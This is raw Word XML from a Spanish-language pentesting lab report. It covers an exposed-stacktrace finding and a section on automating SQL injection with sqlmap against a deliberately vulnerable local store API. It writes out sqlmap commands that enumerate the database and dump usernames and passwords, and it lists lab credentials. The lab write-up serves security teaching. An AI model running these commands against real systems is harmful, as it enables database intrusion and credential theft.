        <w:t xml:space="preserve">Resultado esperado: el cuerpo del error contiene excepción, mensaje y </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00742FE9">
        <w:rPr>
          <w:sz w:val="21"/>
          <w:lang w:val="es-PE"/>
        </w:rPr>
        <w:t>stacktrace</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00742FE9">
        <w:rPr>
          <w:sz w:val="21"/>
          <w:lang w:val="es-PE"/>
        </w:rPr>
        <w:t>. El hallaz</w:t>
      </w:r>
      <w:r w:rsidRPr="00742FE9">
        <w:rPr>
          <w:sz w:val="21"/>
          <w:lang w:val="es-PE"/>
        </w:rPr>
        <w:t>go se clasifica principalmente como manejo inseguro de condiciones excepcionales y secundariamente como configuración insegura por exponer detalles.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67349868" w14:textId="45F91DD7" w:rsidR="003B4509" w:rsidRPr="00742FE9" w:rsidRDefault="003B4509">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="es-PE"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003B4509">
        <w:rPr>
          <w:lang w:val="es-PE"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="00FA9062" wp14:editId="508A3363">
            <wp:extent cx="6048375" cy="2653030"/>
            <wp:effectExtent l="0" t="0" r="952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C7297" w14:textId="77777777" w:rsidR="00217A21" w:rsidRPr="00742FE9" w:rsidRDefault="001E2383">
      <w:pPr>
        <w:spacing w:before="40" w:after="140"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="es-PE"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00742FE9">
        <w:rPr>
          <w:i/>
          <w:color w:val="4A4A4A"/>
          <w:sz w:val="17"/>
          <w:lang w:val="es-PE"/>
        </w:rPr>
        <w:t xml:space="preserve">Figura 13. Respuesta de error con </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00742FE9">
        <w:rPr>
          <w:i/>
          <w:color w:val="4A4A4A"/>
          <w:sz w:val="17"/>
          <w:lang w:val="es-PE"/>
        </w:rPr>
        <w:t>stacktrace</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00742FE9">
        <w:rPr>
          <w:i/>
          <w:color w:val="4A4A4A"/>
          <w:sz w:val="17"/>
          <w:lang w:val="es-PE"/>
        </w:rPr>
        <w:t xml:space="preserve"> y detalles internos.</w:t>
      </w:r>
      <w:r w:rsidRPr="00742FE9">
        <w:rPr>
          <w:color w:val="6B7280"/>
          <w:sz w:val="16"/>
          <w:lang w:val="es-PE"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="00742FE9">
        <w:rPr>
          <w:color w:val="6B7280"/>
          <w:sz w:val="16"/>
          <w:lang w:val="es-PE"/>
        </w:rPr>
        <w:t>Fuente: elaboración propia a partir de la ejecución del laboratorio local.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54C4D209" w14:textId="77777777" w:rsidR="00217A21" w:rsidRPr="00742FE9" w:rsidRDefault="001E2383">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="es-PE"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00742FE9">
        <w:rPr>
          <w:lang w:val="es-PE"/>
        </w:rPr>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="1DBA928A" w14:textId="77777777" w:rsidR="00217A21" w:rsidRPr="00742FE9" w:rsidRDefault="001E2383">
      <w:pPr>
        <w:pStyle w:val="Ttulo1"/>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="10" w:space="1" w:color="20385F"/>
        </w:pBdr>
        <w:spacing w:before="180" w:after="80"/>
        <w:rPr>
          <w:lang w:val="es-PE"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00742FE9">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:lang w:val="es-PE"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">11. SQL </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00742FE9">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:lang w:val="es-PE"/>
        </w:rPr>
        <w:t>Injection</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00742FE9">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:lang w:val="es-PE"/>
        </w:rPr>
        <w:t xml:space="preserve"> automatizada con </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00742FE9">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:lang w:val="es-PE"/>
        </w:rPr>
        <w:t>sqlmap</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="199487DC" w14:textId="77777777" w:rsidR="00217A21" w:rsidRPr="00742FE9" w:rsidRDefault="001E2383">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="es-PE"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00742FE9">
        <w:rPr>
          <w:sz w:val="21"/>
          <w:lang w:val="es-PE"/>
        </w:rPr>
        <w:t xml:space="preserve">Esta sección satisface el requisito de automatizar la SQL </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00742FE9">
        <w:rPr>
          <w:sz w:val="21"/>
          <w:lang w:val="es-PE"/>
        </w:rPr>
        <w:t>Injection</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00742FE9">
        <w:rPr>
          <w:sz w:val="21"/>
          <w:lang w:val="es-PE"/>
        </w:rPr>
        <w:t xml:space="preserve"> y descubrir credenciales de acceso. El </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00742FE9">
        <w:rPr>
          <w:sz w:val="21"/>
          <w:lang w:val="es-PE"/>
        </w:rPr>
        <w:t>endpoint</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00742FE9">
        <w:rPr>
          <w:sz w:val="21"/>
          <w:lang w:val="es-PE"/>
        </w:rPr>
        <w:t xml:space="preserve"> vulnerable concatena </w:t>
      </w:r>
      <w:r w:rsidRPr="00742FE9">
        <w:rPr>
          <w:sz w:val="21"/>
          <w:lang w:val="es-PE"/>
        </w:rPr>
        <w:t xml:space="preserve">q dentro de una cláusula LIKE, por lo que </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00742FE9">
        <w:rPr>
          <w:sz w:val="21"/>
          <w:lang w:val="es-PE"/>
        </w:rPr>
        <w:t>sqlmap</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00742FE9">
        <w:rPr>
          <w:sz w:val="21"/>
          <w:lang w:val="es-PE"/>
        </w:rPr>
        <w:t xml:space="preserve"> puede identificar PostgreSQL y extraer la tabla usuarios.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="722CC096" w14:textId="77777777" w:rsidR="00217A21" w:rsidRDefault="001E2383">
      <w:pPr>
        <w:pStyle w:val="Ttulo2"/>
        <w:spacing w:before="120" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
        </w:rPr>
        <w:t xml:space="preserve">11.1 </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
        </w:rPr>
        <w:t>Instalación</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
        </w:rPr>
        <w:t xml:space="preserve"> y </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
        </w:rPr>
        <w:t>comprobación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5"/>
      </w:tblGrid>
      <w:tr w:rsidR="00217A21" w14:paraId="271B523E" w14:textId="77777777">
        <w:trPr>
          <w:cantSplit/>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9525" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="C6CCD5"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="C6CCD5"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="C6CCD5"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="C6CCD5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52724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Liberation Mono" w:hAnsi="Liberation Mono"/>
                <w:color w:val="1B1F23"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>python --version</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Liberation Mono" w:hAnsi="Liberation Mono"/>
                <w:color w:val="1B1F23"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:br/>
              <w:t>pip install sqlmap</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Liberation Mono" w:hAnsi="Liberation Mono"/>
                <w:color w:val="1B1F23"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:br/>
              <w:t>sqlmap --version</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="5E2ED6E9" w14:textId="77777777" w:rsidR="00217A21" w:rsidRDefault="00217A21">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="45F77FF0" w14:textId="77777777" w:rsidR="00217A21" w:rsidRDefault="001E2383">
      <w:pPr>
        <w:pStyle w:val="Ttulo2"/>
        <w:spacing w:before="120" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
        </w:rPr>
        <w:t>11.2 Detección y enumeración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5"/>
      </w:tblGrid>
      <w:tr w:rsidR="00217A21" w:rsidRPr="00742FE9" w14:paraId="21A97BF4" w14:textId="77777777">
        <w:trPr>
          <w:cantSplit/>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9525" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="C6CCD5"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="C6CCD5"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="C6CCD5"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="C6CCD5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3E51E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proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00742FE9">
              <w:rPr>
                <w:rFonts w:ascii="Liberation Mono" w:hAnsi="Liberation Mono"/>
                <w:color w:val="1B1F23"/>
                <w:sz w:val="15"/>
                <w:lang w:val="es-PE"/>
              </w:rPr>
              <w:t>sqlmap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5"/>
                <w:lang w:val="es-PE"/>
              </w:rPr>
              <w:t xml:space="preserve"> -u "http://127.0.0.1:8080/</w:t>
            </w:r>
            <w:r w:rsidRPr="00742FE9">
              <w:rPr>
                <w:rFonts w:ascii="Liberation Mono" w:hAnsi="Liberation Mono"/>
                <w:color w:val="1B1F23"/>
                <w:sz w:val="15"/>
                <w:lang w:val="es-PE"/>
              </w:rPr>
              <w:t>api/productos/</w:t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5"/>
                <w:lang w:val="es-PE"/>
              </w:rPr>
              <w:t>buscar?q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5"/>
                <w:lang w:val="es-PE"/>
              </w:rPr>
              <w:t>=test" -p q --</w:t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5"/>
                <w:lang w:val="es-PE"/>
              </w:rPr>
              <w:t>batch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5"/>
                <w:lang w:val="es-PE"/>
              </w:rPr>
              <w:t xml:space="preserve"> --</w:t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5"/>
                <w:lang w:val="es-PE"/>
              </w:rPr>
              <w:t>dbs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5"/>
                <w:lang w:val="es-PE"/>
              </w:rPr>
              <w:br/>
            </w:r>
            <w:r w:rsidRPr="00742FE9">
              <w:rPr>
                <w:rFonts w:ascii="Liberation Mono" w:hAnsi="Liberation Mono"/>
                <w:color w:val="1B1F23"/>
                <w:sz w:val="15"/>
                <w:lang w:val="es-PE"/>
              </w:rPr>
              <w:br/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5"/>
                <w:lang w:val="es-PE"/>
              </w:rPr>
              <w:t>sqlmap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5"/>
                <w:lang w:val="es-PE"/>
              </w:rPr>
              <w:t xml:space="preserve"> -u "http://127.0.0.1:8080/api/productos/</w:t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5"/>
                <w:lang w:val="es-PE"/>
              </w:rPr>
              <w:t>buscar?q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5"/>
                <w:lang w:val="es-PE"/>
              </w:rPr>
              <w:t>=test" -p q --</w:t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5"/>
                <w:lang w:val="es-PE"/>
              </w:rPr>
              <w:t>batch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5"/>
                <w:lang w:val="es-PE"/>
              </w:rPr>
              <w:t xml:space="preserve"> -D </w:t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5"/>
                <w:lang w:val="es-PE"/>
              </w:rPr>
              <w:t>tienda_insegura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5"/>
                <w:lang w:val="es-PE"/>
              </w:rPr>
              <w:t xml:space="preserve"> --tables</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="7E050120" w14:textId="10F0E0B6" w:rsidR="00217A21" w:rsidRDefault="00217A21">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:rPr>
          <w:lang w:val="es-PE"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="03E9606A" w14:textId="7E420C9E" w:rsidR="003C79AB" w:rsidRPr="00742FE9" w:rsidRDefault="003C79AB">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="es-PE"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003C79AB">
        <w:rPr>
          <w:lang w:val="es-PE"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="46EB0328" wp14:editId="71B4DCD0">
            <wp:extent cx="6048375" cy="2908300"/>
            <wp:effectExtent l="0" t="0" r="9525" b="635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0E0F9" w14:textId="77777777" w:rsidR="00217A21" w:rsidRPr="00742FE9" w:rsidRDefault="001E2383">
      <w:pPr>
        <w:spacing w:before="40" w:after="140"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="es-PE"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00742FE9">
        <w:rPr>
          <w:i/>
          <w:color w:val="4A4A4A"/>
          <w:sz w:val="17"/>
          <w:lang w:val="es-PE"/>
        </w:rPr>
        <w:t xml:space="preserve">Figura 14. </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00742FE9">
        <w:rPr>
          <w:i/>
          <w:color w:val="4A4A4A"/>
          <w:sz w:val="17"/>
          <w:lang w:val="es-PE"/>
        </w:rPr>
        <w:t>sqlmap</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00742FE9">
        <w:rPr>
          <w:i/>
          <w:color w:val="4A4A4A"/>
          <w:sz w:val="17"/>
          <w:lang w:val="es-PE"/>
        </w:rPr>
        <w:t xml:space="preserve"> detectando el parámetro q e </w:t>
      </w:r>
      <w:r w:rsidRPr="00742FE9">
        <w:rPr>
          <w:i/>
          <w:color w:val="4A4A4A"/>
          <w:sz w:val="17"/>
          <w:lang w:val="es-PE"/>
        </w:rPr>
        <w:t>identificando PostgreSQL.</w:t>
      </w:r>
      <w:r w:rsidRPr="00742FE9">
        <w:rPr>
          <w:color w:val="6B7280"/>
          <w:sz w:val="16"/>
          <w:lang w:val="es-PE"/>
        </w:rPr>
        <w:br/>
        <w:t>Fuente: elaboración propia a partir de la ejecución del laboratorio local.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08B39816" w14:textId="77777777" w:rsidR="00217A21" w:rsidRDefault="001E2383">
      <w:pPr>
        <w:pStyle w:val="Ttulo2"/>
        <w:spacing w:before="120" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
        </w:rPr>
        <w:t xml:space="preserve">11.3 </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
        </w:rPr>
        <w:t>Volcado</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
        </w:rPr>
        <w:t xml:space="preserve"> de </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
        </w:rPr>
        <w:t>credenciales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5"/>
      </w:tblGrid>
      <w:tr w:rsidR="00217A21" w:rsidRPr="00742FE9" w14:paraId="25365A6E" w14:textId="77777777">
        <w:trPr>
          <w:cantSplit/>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9525" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="C6CCD5"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="C6CCD5"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="C6CCD5"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="C6CCD5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E3F7C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proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00742FE9">
              <w:rPr>
                <w:rFonts w:ascii="Liberation Mono" w:hAnsi="Liberation Mono"/>
                <w:color w:val="1B1F23"/>
                <w:sz w:val="15"/>
                <w:lang w:val="es-PE"/>
              </w:rPr>
              <w:t>sqlmap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5"/>
                <w:lang w:val="es-PE"/>
              </w:rPr>
              <w:t xml:space="preserve"> -u "http://127.0.0.1:8080/api/productos/</w:t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5"/>
                <w:lang w:val="es-PE"/>
              </w:rPr>
              <w:t>buscar?q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5"/>
                <w:lang w:val="es-PE"/>
              </w:rPr>
              <w:t>=test" -p q --</w:t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5"/>
                <w:lang w:val="es-PE"/>
              </w:rPr>
              <w:t>batch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5"/>
                <w:lang w:val="es-PE"/>
              </w:rPr>
              <w:t xml:space="preserve"> -D </w:t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5"/>
                <w:lang w:val="es-PE"/>
              </w:rPr>
              <w:t>tienda_insegura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5"/>
                <w:lang w:val="es-PE"/>
              </w:rPr>
              <w:t xml:space="preserve"> -T usuarios -C </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidRPr="00742FE9">
              <w:rPr>
                <w:rFonts w:ascii="Liberation Mono" w:hAnsi="Liberation Mono"/>
                <w:color w:val="1B1F23"/>
                <w:sz w:val="15"/>
                <w:lang w:val="es-PE"/>
              </w:rPr>
              <w:t>username,password</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r w:rsidRPr="00742FE9">
              <w:rPr>
                <w:rFonts w:ascii="Liberation Mono" w:hAnsi="Liberation Mono"/>
                <w:color w:val="1B1F23"/>
                <w:sz w:val="15"/>
                <w:lang w:val="es-PE"/>
              </w:rPr>
              <w:t>,role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5"/>
                <w:lang w:val="es-PE"/>
              </w:rPr>
              <w:t xml:space="preserve"> --</w:t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5"/>
                <w:lang w:val="es-PE"/>
              </w:rPr>
              <w:t>dump</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="3137F478" w14:textId="426DA999" w:rsidR="00217A21" w:rsidRDefault="00217A21">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:rPr>
          <w:lang w:val="es-PE"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="04102528" w14:textId="150AFF7B" w:rsidR="00DC6879" w:rsidRPr="00742FE9" w:rsidRDefault="00DC6879">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="es-PE"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4AAA7683" w14:textId="6C774110" w:rsidR="00217A21" w:rsidRDefault="001E2383">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="21"/>
          <w:lang w:val="es-PE"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00742FE9">
        <w:rPr>
          <w:sz w:val="21"/>
          <w:lang w:val="es-PE"/>
        </w:rPr>
        <w:t xml:space="preserve">Resultado esperado: </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00742FE9">
        <w:rPr>
          <w:sz w:val="21"/>
          <w:lang w:val="es-PE"/>
        </w:rPr>
        <w:t>sqlmap</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00742FE9">
        <w:rPr>
          <w:sz w:val="21"/>
          <w:lang w:val="es-PE"/>
        </w:rPr>
        <w:t xml:space="preserve"> muestra filas con </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00742FE9">
        <w:rPr>
          <w:sz w:val="21"/>
          <w:lang w:val="es-PE"/>
        </w:rPr>
        <w:t>admin</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00742FE9">
        <w:rPr>
          <w:sz w:val="21"/>
          <w:lang w:val="es-PE"/>
        </w:rPr>
        <w:t xml:space="preserve">/admin123, </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00742FE9">
        <w:rPr>
          <w:sz w:val="21"/>
          <w:lang w:val="es-PE"/>
        </w:rPr>
        <w:t>jperez</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00742FE9">
        <w:rPr>
          <w:sz w:val="21"/>
          <w:lang w:val="es-PE"/>
        </w:rPr>
        <w:t xml:space="preserve">/password1 y </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00742FE9">
        <w:rPr>
          <w:sz w:val="21"/>
          <w:lang w:val="es-PE"/>
        </w:rPr>
        <w:t>mgarcia</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00742FE9">
        <w:rPr>
          <w:sz w:val="21"/>
          <w:lang w:val="es-PE"/>
        </w:rPr>
        <w:t>/qwerty123, además de guardar archivos de salida en su carpeta de resultados.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3607FC0C" w14:textId="2F6EC38A" w:rsidR="003C79AB" w:rsidRPr="00742FE9" w:rsidRDefault="00DC6879">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="es-PE"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DC6879">
        <w:rPr>
          <w:lang w:val="es-PE"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="475063B1" wp14:editId="045D073C">
            <wp:extent cx="6048375" cy="3043555"/>
            <wp:effectExtent l="0" t="0" r="9525" b="444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D1ADC" w14:textId="77777777" w:rsidR="00217A21" w:rsidRPr="00742FE9" w:rsidRDefault="001E2383">
      <w:pPr>
        <w:spacing w:before="40" w:after="140"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="es-PE"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00742FE9">
        <w:rPr>
          <w:i/>
          <w:color w:val="4A4A4A"/>
          <w:sz w:val="17"/>
          <w:lang w:val="es-PE"/>
        </w:rPr>
        <w:t xml:space="preserve">Figura 15. </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00742FE9">
        <w:rPr>
          <w:i/>
          <w:color w:val="4A4A4A"/>
          <w:sz w:val="17"/>
          <w:lang w:val="es-PE"/>
        </w:rPr>
        <w:t>sqlmap</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00742FE9">
        <w:rPr>
          <w:i/>
          <w:color w:val="4A4A4A"/>
          <w:sz w:val="17"/>
          <w:lang w:val="es-PE"/>
        </w:rPr>
        <w:t xml:space="preserve"> mostrando la tabla </w:t>
      </w:r>
      <w:r w:rsidRPr="00742FE9">
        <w:rPr>
          <w:i/>
          <w:color w:val="4A4A4A"/>
          <w:sz w:val="17"/>
          <w:lang w:val="es-PE"/>
        </w:rPr>
        <w:t>usuarios y las credenciales de laboratorio.</w:t>
      </w:r>
      <w:r w:rsidRPr="00742FE9">
        <w:rPr>
          <w:color w:val="6B7280"/>
          <w:sz w:val="16"/>
          <w:lang w:val="es-PE"/>
        </w:rPr>
        <w:br/>
        <w:t>Fuente: elaboración propia a partir de la ejecución del laboratorio local.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="773C4BED" w14:textId="77777777" w:rsidR="00217A21" w:rsidRDefault="001E2383">
      <w:pPr>
        <w:pStyle w:val="Ttulo2"/>
        <w:spacing w:before="120" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
        </w:rPr>
        <w:t xml:space="preserve">11.4 Script </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
        </w:rPr>
        <w:t>incluido</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
        </w:rPr>
        <w:t xml:space="preserve"> en el proyecto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5"/>
      </w:tblGrid>
      <w:tr w:rsidR="00217A21" w14:paraId="43A4CE23" w14:textId="77777777">
        <w:trPr>
          <w:cantSplit/>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9525" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="C6CCD5"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="C6CCD5"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="C6CCD5"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="C6CCD5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9B36A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Liberation Mono" w:hAnsi="Liberation Mono"/>
                <w:color w:val="1B1F23"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>Set-ExecutionPolicy -Scope Process Bypass</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Liberation Mono" w:hAnsi="Liberation Mono"/>
                <w:color w:val="1B1F23"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:br/>
              <w:t>.\pentesting\sqlmap\run-sqlmap.ps1</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="2484EC62" w14:textId="77777777" w:rsidR="00217A21" w:rsidRDefault="00217A21">
      <w:pPr>
        <w:spacing w:after="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5"/>
      </w:tblGrid>
      <w:tr w:rsidR="00217A21" w:rsidRPr="00742FE9" w14:paraId="6A4AB189" w14:textId="77777777">
        <w:trPr>
          <w:cantSplit/>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9525" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="single" w:sz="18" w:space="0" w:color="20385F"/>
              <w:bottom w:val="nil"/>
              <w:right w:val="nil"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="EA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6D3303" w14:textId="77777777" w:rsidR="00217A21" w:rsidRPr="00742FE9" w:rsidRDefault="001E2383">
            <w:pPr>
              <w:spacing w:after="0" w:line="252" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:lang w:val="es-PE"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00742FE9">
              <w:rPr>
                <w:b/>
                <w:color w:val="20385F"/>
                <w:sz w:val="19"/>
                <w:lang w:val="es-PE"/>
              </w:rPr>
              <w:t>Conservación de eviden</w:t>
            </w:r>
            <w:r w:rsidRPr="00742FE9">
              <w:rPr>
                <w:b/>
                <w:color w:val="20385F"/>
                <w:sz w:val="19"/>
                <w:lang w:val="es-PE"/>
              </w:rPr>
              <w:t xml:space="preserve">cia: </w:t>
            </w:r>
            <w:r w:rsidRPr="00742FE9">
              <w:rPr>
                <w:sz w:val="19"/>
                <w:lang w:val="es-PE"/>
              </w:rPr>
              <w:t xml:space="preserve">Guardar la salida completa de consola y el CSV generado por </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00742FE9">
              <w:rPr>
                <w:sz w:val="19"/>
                <w:lang w:val="es-PE"/>
              </w:rPr>
              <w:t>sqlmap</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
